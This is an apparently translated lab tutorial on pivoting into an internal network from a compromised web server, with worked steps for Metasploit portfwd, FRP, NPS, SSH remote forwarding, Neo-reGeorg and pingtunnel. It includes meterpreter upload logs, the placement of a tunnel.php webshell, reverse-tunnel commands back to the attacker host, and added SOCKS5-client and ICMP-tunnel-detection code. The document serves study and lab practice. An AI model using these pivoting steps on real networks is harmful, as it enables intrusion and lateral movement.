MSF Internal Network Pivoting: Port Forwarding
I. Overview
1. Introduction
- This article continues the MSF internal network pivoting post
- Read that one first if you are not familiar with the setup
2. The (ugly) topology diagram
The diagram itself is an image. The hosts used throughout are: Kali (attacker) 192.168.88.141; the CentOS-2 web server, which doubles as the jump host, 192.168.88.132 with a second interface into the internal 10.0.0.x network; Windows 2003 (target) 10.0.0.3; and the physical host machine 192.168.88.1.
II. MSF port forwarding
1. Enter the web server session
I also want to reach Windows 2003's port 3389 from my own machine, so I need a port mapping.
#List sessions
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:49414 (192.168.88.132)
#Interact with the web server's session
msf6 > sessions 2
[*] Starting interaction with 2...
#Map Windows 2003's port 3389 to port 13389 on Kali
meterpreter > portfwd add -l 13389 -r 10.0.0.3 -p 3389
[*] Forward TCP relay created: (local) :13389 -> (remote) 10.0.0.3:3389
2. Check that the port is open on Kali
┌──(sword㉿kali-3)-[~]
└─$ netstat -antp |grep 13389
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:13389 0.0.0.0:* LISTEN -
tcp 0 0 192.168.88.141:13389 192.168.88.1:63001 ESTABLISHED -
3. Connect from the host machine
4. Connection successful
Note that the listener is 0.0.0.0:13389, so anyone who can reach Kali can reach the target's RDP through it; pass -L 127.0.0.1 to portfwd if only Kali itself should use the forward. Also, this kind of forward only ever exists on Kali (the attacker side): it cannot open a port on the jump host for machines on the internal network to reach, which is what the tools below are for.
III. FRP
1. FRP download
- Download:
https://github.com/fatedier/frp/releases/tag/v0.52.3
- Chinese documentation:
https://github.com/fatedier/frp/blob/dev/README_zh.md
Tip:
If your attack box is Linux and the jump host is Windows, download both the Linux and the Windows builds
If both are Linux, the Linux build alone is enough
2. Tool installation
This is in a new terminal window I opened
3. Edit the configuration files
#The control port is 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frps.toml
bindPort = 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frpc.toml
#Jump host IP (where frps runs)
serverAddr = "192.168.88.132"
#Jump host port
serverPort = 7000
[[proxies]]
#Proxy name
name = "web-tcp"
#Protocol
type = "tcp"
#Local address on Kali
localIP = "127.0.0.1"
#Local port on Kali
localPort = 1000
#Port the tunnel opens on the jump host
remotePort = 2000
7000: the control port frps listens on (on the jump host); frpc on Kali connects to it to build the tunnel
1000: the local port on Kali that frpc publishes through the tunnel
2000: the port frps opens on the jump host; connections to it from the internal network are relayed back through the tunnel to Kali's port 1000
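The frps.toml above has no authentication, so any frpc that can reach port 7000 on the jump host, for example another machine on 192.168.88.0/24, can register its own proxies through your foothold. The following is an added example, not the article's configuration, showing the same two files with frp's token authentication enabled; the token value is a placeholder you should replace with a long random string, and the two files are shown in one block for reading only (they stay two separate files).

```toml
# frps.toml  (runs on the jump host 192.168.88.132)
bindPort = 7000
# Reject any frpc that does not present the shared token
auth.method = "token"
auth.token = "replace-with-a-long-random-value"

# frpc.toml  (runs on Kali 192.168.88.141)
serverAddr = "192.168.88.132"
serverPort = 7000
# Must match the token in frps.toml
auth.method = "token"
auth.token = "replace-with-a-long-random-value"

[[proxies]]
name = "web-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 1000
# Opened on the jump host; traffic is relayed back to Kali's port 1000
remotePort = 2000
```

With the token set, frps logs a login failure for clients that do not present it; the frpc output should still show "login to server success" as it does above.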
4. Upload FRP
#Upload frps
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/frps
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/frps -> frps
#Upload the configuration file
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/frps.toml
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
[*] Uploaded -1.00 B of 16.00 B (-6.25%): /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
#Drop into a shell
meterpreter > shell
Process 3607 created.
Channel 3 created.
#Use python to spawn a proper bash with a pty
python -c "import pty;pty.spawn('/bin/bash')"
#Make it executable
[root@CentOS-2 ~]# chmod +x frps
chmod +x frps
#Start it in the background
[root@CentOS-2 ~]# ./frps -c frps.toml &
./frps -c frps.toml &
[1] 3623
[root@CentOS-2 ~]# 2023/11/08 20:18:30 [I] [root.go:102] frps uses config file: frps.toml
2023/11/08 20:18:30 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/08 20:18:30 [I] [root.go:111] frps started successfully
Run frpc on Kali to build the tunnel
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# ls
LICENSE frpc frpc.toml frps frps.toml
#Run in the background
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# ./frpc -c frpc.toml &
[1] 26270
2023/11/08 20:21:50 [I] [root.go:139] start frpc service for config file [frpc.toml]
2023/11/08 20:21:50 [I] [service.go:299] [c89df2cf86f29c05] login to server success, get run id [c89df2cf86f29c05]
2023/11/08 20:21:50 [I] [proxy_manager.go:156] [c89df2cf86f29c05] proxy added: [web-tcp]
2023/11/08 20:21:50 [I] [control.go:173] [c89df2cf86f29c05] [web-tcp] start proxy success
5. Start an HTTP service on Kali
#Start the HTTP service
┌──(root㉿kali-3)-[/home/sword]
└─# python -m http.server 1000
Serving HTTP on 0.0.0.0 port 1000 (http://0.0.0.0:1000/) ...
127.0.0.1 - - [08/Nov/2023 20:37:46] "GET / HTTP/1.1" 200 -
Browse to port 2000 on the jump host from Windows 2003; the request is relayed to Kali's port 1000 (the 127.0.0.1 entry in the access log above is the frpc side delivering it).
In a real engagement Windows 2003 would have a vulnerability, e.g. you obtain a webshell, and you would have it connect back to Kali through this tunnel so you can use your own tooling for privilege escalation or other post-exploitation.
IV. NPS
1. NPS download
- Download:
https://github.com/ehang-io/nps/releases
- Chinese documentation:
https://github.com/ehang-io/nps/blob/master/README_zh.md
There is a client package and a server package
2. Tool installation
#Extract
┌──(root㉿kali-3)-[/home/sword]
└─# tar -xf linux_amd64_server.tar.gz
#Start
┌──(root㉿kali-3)-[/home/sword]
└─# ./nps
2023/11/08 21:32:46.538 [I] [nps.go:202] the version of server is 0.26.10 ,allow client core version to be 0.26.0
2023/11/08 21:32:46.652 [I] [connection.go:36] server start, the bridge type is tcp, the bridge port is 8024
2023/11/08 21:32:46.653 [I] [server.go:200] tunnel task start mode:httpHostServer port 0
2023/11/08 21:32:46.653 [I] [connection.go:71] web management start, access port is 8080
2023/11/08 21:32:46.654 [I] [connection.go:62] start https listener, port is 443
2023/11/08 21:32:46.654 [I] [connection.go:53] start http listener, port is 80
Browse to port 8080; the default account is admin with password 123. Change these defaults (web_username and web_password in conf/nps.conf) before starting the server: the log above shows the management interface on 8080, the bridge on 8024 and listeners on 80/443, all reachable by anyone who can reach Kali, and a default login hands them control of your tunnels.
3. Create a client
In the web UI, add a client; it represents the Linux web server (the jump host)
4. Upload the client to the jump host
#Enter the Linux session
msf6 > sessions 1
[*] Starting interaction with 1...
#Upload the client
meterpreter > upload /home/sword/linux_amd64_client.tar.gz
[*] Uploading : /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
[*] Uploaded -1.00 B of 4.43 MiB (0.0%): /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
[*] Completed : /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
#Drop into a shell
meterpreter > shell
Process 4022 created.
Channel 5 created.
#Extract
tar -xf linux_amd64_client.tar.gz
#Run the client with the key the web UI generated for it
./npc -server=192.168.88.141:8024 -vkey=bdo71ez62l2j9dta -type=tcp
2023/11/08 21:41:24.943 [I] [npc.go:231] the version of client is 0.26.10, the core version of client is 0.26.0
2023/11/08 21:41:24.944 [I] [client.go:72] Successful connection with server 192.168.88.141:8024
5. Establish the tunnel
Add the internal HTTP service as a TCP tunnel in the web UI (Kali port 8000 to 10.0.0.3:80)
The client shows as online, which means the connection succeeded
Accessing Kali's port 8000 is now the same as accessing Windows 2003's port 80
V. SSH port forwarding
1. HTTP port forwarding
#Drop into a shell
meterpreter > shell
Process 4100 created.
Channel 2 created.
#Spawn bash with a pty
python -c "import pty;pty.spawn('/bin/bash')"
#Forward the port: a remote (-R) forward, so sshd on Kali listens on 7000 and relays to 10.0.0.3:80 through the SSH connection
[root@CentOS-2 ~]# ssh -CfNg -R 0.0.0.0:7000:10.0.0.3:80 sword@192.168.88.141
ssh -CfNg -R 0.0.0.0:7000:10.0.0.3:80 sword@192.168.88.141
sword@192.168.88.141's password: sword
2. Access Kali's port 7000
Only Kali itself can reach it. Despite the 0.0.0.0 in the -R argument and the -g switch, sshd binds a remote forward to loopback unless GatewayPorts is enabled in /etc/ssh/sshd_config on Kali (-g only applies to the client-side -L and -D forwards). Set GatewayPorts yes (or clientspecified, so the bind address given in the command is honoured) on Kali's sshd and restart it if the host machine needs to reach the forward. Note also that the password for an account on your own box has just been typed into a shell on the compromised host; use a dedicated, restricted account or a throwaway key for this.
┌──(root㉿kali-3)-[/home/sword]
└─# netstat -antp |grep 7000
tcp 0 0 127.0.0.1:7000 0.0.0.0:* LISTEN 76805/sshd: sword
tcp6 0 0 ::1:7000 :::* LISTEN 76805/sshd: sword
VI. Neo-reGeorg
1. Tool download
https://github.com/L-codes/Neo-reGeorg.git
https://github.com/L-codes/Neo-reGeorg
- Chinese README:
https://github.com/L-codes/Neo-reGeorg/blob/master/README.md
2. Tool installation
#Extract
┌──(root㉿kali-3)-[/home/sword]
└─# unzip Neo-reGeorg-master.zip
Archive: Neo-reGeorg-master.zip
015c557cffe26c7a5aa6a77e19493df2ceef252e
creating: Neo-reGeorg-master/
creating: Neo-reGeorg-master/.github/
creating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/
inflating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/bug_report.md
inflating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/#U9519#U8bef#U63d0#U4ea4.md
inflating: Neo-reGeorg-master/.gitignore
inflating: Neo-reGeorg-master/CHANGELOG-en.md
inflating: Neo-reGeorg-master/CHANGELOG.md
inflating: Neo-reGeorg-master/LICENSE
inflating: Neo-reGeorg-master/README-en.md
inflating: Neo-reGeorg-master/README.md
inflating: Neo-reGeorg-master/neoreg.py
creating: Neo-reGeorg-master/templates/
inflating: Neo-reGeorg-master/templates/NeoreGeorg.java
inflating: Neo-reGeorg-master/templates/tunnel.ashx
inflating: Neo-reGeorg-master/templates/tunnel.aspx
inflating: Neo-reGeorg-master/templates/tunnel.go
inflating: Neo-reGeorg-master/templates/tunnel.jsp
inflating: Neo-reGeorg-master/templates/tunnel.jspx
inflating: Neo-reGeorg-master/templates/tunnel.php
#Enter the directory
┌──(root㉿kali-3)-[/home/sword]
└─# cd Neo-reGeorg-master
#List the contents
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# ls
CHANGELOG-en.md CHANGELOG.md LICENSE README-en.md README.md neoreg.py templates
3. Generate the scripts
#Generate the tunnel scripts; the key is sword
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py generate -k sword
[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.go
4. Upload the script
#Enter the jump host's session
msf6 > sessions 1
[*] Starting interaction with 1...
#Upload the tunnel script
meterpreter > upload /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php
[*] Uploading : /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
[*] Uploaded -1.00 B of 5.67 KiB (-0.02%): /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
[*] Completed : /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
#Drop into a shell
meterpreter > shell
Process 1362 created.
Channel 3 created.
#Move it into the web server's document root
mv tunnel.php /opt/lampp/htdocs/sundry
5. Connect to the tunnel script
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py -k sword -u http://192.168.88.132/sundry/tunnel.php -l 0.0.0.0 -p 1080
[Neo-reGeorg ASCII-art banner, version 5.1.0]
[ Github ] https://github.com/L-codes/Neo-reGeorg
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting SOCKS5 server [0.0.0.0:1080]
Tunnel at:
http://192.168.88.132/sundry/tunnel.php
+------------------------------------------------------------------------+
-l: the address to listen on, i.e. who can use the proxy (0.0.0.0 = anyone who can reach Kali)
-p: the local port the SOCKS5 proxy listens on
-u: the URL of the uploaded tunnel script
-k: the key chosen when the script was generated; it protects the HTTP leg between neoreg.py and tunnel.php
6. Access Windows 2003's HTTP service
Set Kali's browser to use the SOCKS5 proxy at 127.0.0.1:1080
Then browse to Windows 2003 directly
7. Access from the host machine
This needs a proxy extension; the browser's built-in proxy setting did not work here
The 141 in the screenshot is Kali's IP address. The SOCKS listener started above is not protected by -k, so with -l 0.0.0.0 anyone who can reach Kali's port 1080 gets a path into the target network; use -l 127.0.0.1 unless another machine really needs it, and stop neoreg.py when you are done.
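The browser, with or without an extension, is just a SOCKS5 client; the exchange it performs against the neoreg.py listener is a method negotiation followed by a CONNECT request. The script below is an added example (not Neo-reGeorg's code, nor the article's) that performs that exchange by hand, which also gives a way to test the tunnel from the command line when the browser route fails as in step 7. The addresses in the main block are assumed from the article: neoreg.py on Kali 192.168.88.141:1080 and the Windows 2003 web server at 10.0.0.3:80.

```python
"""Minimal SOCKS5 (RFC 1928) CONNECT client to exercise the Neo-reGeorg tunnel
without a browser. Added example, not Neo-reGeorg's or the article's code.
The addresses in __main__ are assumed from the article."""
import socket
import struct

SOCKS5, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {0: "succeeded", 1: "general SOCKS server failure",
              2: "connection not allowed by ruleset", 3: "network unreachable",
              4: "host unreachable", 5: "connection refused", 6: "TTL expired",
              7: "command not supported", 8: "address type not supported"}


def build_greeting() -> bytes:
    """Version 5, one offered method, 0x00 = no authentication."""
    return bytes([SOCKS5, 1, NO_AUTH])


def parse_method_select(data: bytes) -> int:
    """Server picks a method; 0xFF means none of ours was acceptable."""
    if len(data) < 2 or data[0] != SOCKS5:
        raise ValueError("not a SOCKS5 server")
    if data[1] == 0xFF:
        raise ValueError("server rejected the offered auth methods")
    return data[1]


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request with a domain-name ATYP: the proxy end, which sits inside
    the target network, resolves the name, so no DNS lookup leaks from Kali
    (the same effect as curl's --socks5-hostname)."""
    name = host.encode("idna")
    if not 0 < len(name) < 256:
        raise ValueError("hostname must be 1..255 bytes")
    return (struct.pack("!BBBB", SOCKS5, CMD_CONNECT, 0x00, ATYP_DOMAIN)
            + bytes([len(name)]) + name + struct.pack("!H", port))


def parse_reply(data: bytes):
    """Return (reply_code, bound_addr, bound_port) from a CONNECT reply."""
    if len(data) < 4 or data[0] != SOCKS5:
        raise ValueError("bad SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr, off = socket.inet_ntop(socket.AF_INET, data[4:8]), 8
    elif atyp == ATYP_IPV6:
        addr, off = socket.inet_ntop(socket.AF_INET6, data[4:20]), 20
    elif atyp == ATYP_DOMAIN:
        addr, off = data[5:5 + data[4]].decode(), 5 + data[4]
    else:
        raise ValueError("unknown ATYP %d" % atyp)
    (port,) = struct.unpack("!H", data[off:off + 2])
    return rep, addr, port


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection early")
        buf += chunk
    return buf


def socks5_connect(proxy_host, proxy_port, target_host, target_port, timeout=15):
    """Return a socket already tunnelled to target_host:target_port."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    s.sendall(build_greeting())
    parse_method_select(_recv_exact(s, 2))
    s.sendall(build_connect(target_host, target_port))
    head = _recv_exact(s, 4)
    if head[3] == ATYP_IPV4:
        rest = _recv_exact(s, 6)
    elif head[3] == ATYP_IPV6:
        rest = _recv_exact(s, 18)
    elif head[3] == ATYP_DOMAIN:
        n = _recv_exact(s, 1)
        rest = n + _recv_exact(s, n[0] + 2)
    else:
        s.close()
        raise ValueError("unknown ATYP in reply")
    rep, _, _ = parse_reply(head + rest)
    if rep != 0:
        s.close()
        raise OSError("SOCKS5 CONNECT failed: %s" % REPLY_TEXT.get(rep, rep))
    return s


def http_get_via_socks(proxy_host, proxy_port, target_host, target_port=80, path="/"):
    """Fetch one page through the tunnel and return the raw HTTP response."""
    s = socks5_connect(proxy_host, proxy_port, target_host, target_port)
    s.sendall(("GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n"
               % (path, target_host)).encode())
    chunks = []
    while True:
        c = s.recv(4096)
        if not c:
            break
        chunks.append(c)
    s.close()
    return b"".join(chunks)


if __name__ == "__main__":
    # Assumed from the article: neoreg.py listening on Kali 192.168.88.141:1080,
    # Windows 2003 web server at 10.0.0.3:80 inside the target network.
    resp = http_get_via_socks("192.168.88.141", 1080, "10.0.0.3")
    print(resp.split(b"\r\n", 1)[0].decode(errors="replace"))
```

Sending the target as a domain name rather than pre-resolving it matters for internal hostnames: Kali has no DNS for the target network, and a resolver query from Kali would also be visible outside the tunnel.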
VII. Oray Peanut Shell (贝锐花生壳)
1. Download
https://hsk.oray.com/
2. Introduction
- It requires real-name identity verification, so it is not demonstrated here
VIII. pingtunnel
1. The ICMP protocol
- Brief introduction:
https://www.rfc-editor.org/rfc/inline-errata/rfc792.html
- Download:
https://github.com/esrrhs/pingtunnel
2. Screenshot analysis of ICMP
request: echo request packet
reply: echo reply packet
The screenshot (not reproduced) shows an ordinary ping, one echo request followed by its echo reply; pingtunnel carries the TCP stream inside the data field of exactly these packets.
3. Start the server
#Move the tool
┌──(root㉿kali-3)-[/home/sword]
└─# mv pingtunnel_linux_amd64.zip shell/
#Enter the directory
┌──(root㉿kali-3)-[/home/sword]
└─# cd shell
#Extract
┌──(root㉿kali-3)-[/home/sword/shell]
└─# unzip pingtunnel_linux_amd64.zip
Archive: pingtunnel_linux_amd64.zip
inflating: pingtunnel
#List the contents
┌──(root㉿kali-3)-[/home/sword/shell]
└─# ls
pingtunnel pingtunnel_linux_amd64.zip windows.exe
#Start the server (as root, since it needs a raw ICMP socket)
┌──(root㉿kali-3)-[/home/sword/shell]
└─# ./pingtunnel -type server
4. Start the client on the jump host
In a real engagement this would be done through the MSF session; here I used ssh for convenience
#Extract
[root@CentOS-2 ~]# unzip pingtunnel_linux_amd64.zip
Archive: pingtunnel_linux_amd64.zip
inflating: pingtunnel
#Start the client
[root@CentOS-2 ~]# ./pingtunnel -type client -l :5555 -s 192.168.88.141 -t 192.168.88.141:1000 -tcp 1
-type client: run as the client
-l :5555: listen on TCP port 5555 on all interfaces of the jump host
-s 192.168.88.141: the pingtunnel server (Kali)
-t 192.168.88.141:1000: where the server end forwards the traffic, Kali's port 1000
-tcp 1: carry TCP inside the ICMP tunnel (1 enables it)
Both ends run as root because they need raw ICMP sockets, and the server as started above accepts any client that can ping Kali; pingtunnel's -key option, set to the same value on both sides, restricts that.
5. Open port 1000 on Kali
Because the jump host hands the data to port 1000, something must be listening on Kali's port 1000
┌──(root㉿kali-3)-[/home/sword]
└─# python -m http.server 1000
Serving HTTP on 0.0.0.0 port 1000 (http://0.0.0.0:1000/) ...
Browse to port 5555 on the jump host from Windows 2003
6. Packet capture analysis
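The capture is an image in the original; what it shows is echo requests and replies whose data field carries the HTTP request and response instead of a ping's filler bytes. The following is an added example, neither pingtunnel's code nor the article's: it parses ICMP echo packets, verifies the RFC 792 checksum, and flags payloads that match no standard ping, which is also the check a defender would run over such a capture to spot an ICMP tunnel. The packets in sample_packets() are constructed here, not captured.

```python
"""Parse ICMP echo packets (RFC 792) and flag ones whose payload does not look
like a normal ping, which is what a pingtunnel flow looks like on the wire.
Added example; not pingtunnel's code. sample_packets() is constructed data."""
import struct

ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8
# Default payloads of common ping implementations:
#   Linux iputils: 56 bytes = 8-byte timestamp followed by bytes 0x10..0x37
#   Windows ping:  32 bytes of "abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_PATTERN = bytes(range(0x10, 0x10 + 48))
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words (odd length is zero padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header: type, code, checksum, identifier, sequence; then the data."""
    csum = icmp_checksum(struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    if len(packet) < 8:
        raise ValueError("shorter than the 8-byte ICMP header")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    # Summing a correct packet including its own checksum field gives all ones,
    # so the complement is zero.
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": icmp_checksum(packet) == 0}


def classify(packet: bytes) -> str:
    """'ping' for a default Linux/Windows echo payload, otherwise the reason."""
    p = parse_echo(packet)
    if p["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return "not-echo"
    if not p["checksum_ok"]:
        return "bad-checksum"
    pl = p["payload"]
    if (len(pl) == 56 and pl[8:] == LINUX_PING_PATTERN) or pl == WINDOWS_PING_PAYLOAD:
        return "ping"
    return "suspicious: %d-byte payload matches no standard ping pattern" % len(pl)


def summarize(packets) -> dict:
    """Per echo identifier: packet count, distinct payload sizes and how many
    were flagged. A ping run uses one payload size; a tunnel's sizes vary
    with whatever it is carrying."""
    out = {}
    for pkt in packets:
        p = parse_echo(pkt)
        entry = out.setdefault(p["id"], {"count": 0, "sizes": set(), "flagged": 0})
        entry["count"] += 1
        entry["sizes"].add(len(p["payload"]))
        if classify(pkt).startswith("suspicious"):
            entry["flagged"] += 1
    return out


def sample_packets():
    """Constructed samples: two ordinary pings and two tunnel-like echo
    requests carrying an HTTP request split across packets with one id."""
    linux_ping = build_echo(ICMP_ECHO_REQUEST, 0x1234, 1, b"\x00" * 8 + LINUX_PING_PATTERN)
    windows_ping = build_echo(ICMP_ECHO_REQUEST, 0x0001, 7, WINDOWS_PING_PAYLOAD)
    http = b"GET / HTTP/1.1\r\nHost: 192.168.88.141:1000\r\n\r\n"
    t1 = build_echo(ICMP_ECHO_REQUEST, 0x0B1D, 1, http[:20])
    t2 = build_echo(ICMP_ECHO_REQUEST, 0x0B1D, 2, http[20:] + b"\x00" * 300)
    return [linux_ping, windows_ping, t1, t2]


if __name__ == "__main__":
    for pkt in sample_packets():
        print(hex(parse_echo(pkt)["id"]), classify(pkt))
    print(summarize(sample_packets()))
```

To run this over a real capture, feed it the ICMP layer of each packet (the bytes after the IP header); the payload-pattern check is deliberately strict, so a ping with a non-default size (-s) is also flagged and should be whitelisted per environment.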
7. Logic
- Anything on the internal network that connects to port 5555 on the jump host is carried over ICMP to Kali and delivered to Kali's port 1000